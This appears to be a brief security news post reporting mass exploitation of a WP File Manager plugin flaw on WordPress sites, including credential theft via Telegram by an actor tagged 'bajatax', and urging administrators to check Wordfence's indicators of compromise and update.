Last week, a flaw in the WP File Manager plugin for WordPress was discovered being abused in the wild. It was quickly reported and subsequently patched by the developers on the same day. Fast forward one week later and, as of yesterday, over 2.6 million sites have been attacked in an attempt to exploit this plugin before the site administrator’s update. At least one successful attacker has been modifying the vulnerable file to lock out other exploit attempts, also adding $content=”by bajatax” to the code. At least one other actor has been identified exploiting the plugin as well, due to a consistently found password hash used to lock out other exploitation attempts. Once a site has been infected, “bajatax” uses the Telegram API to send stolen credentials of any user attempting to log into the site.
Wordfence has provided several indicators of compromise (IOCs) to look for. Any WordPress administrator using the WP File Manager plugin should check their WordPress installation for these IOCs and update to the latest version of the plugin immediately. As can be seen by the high volume of attacks in such a short amount of time, WordPress plugins can be a very highly sought-after target for compromise.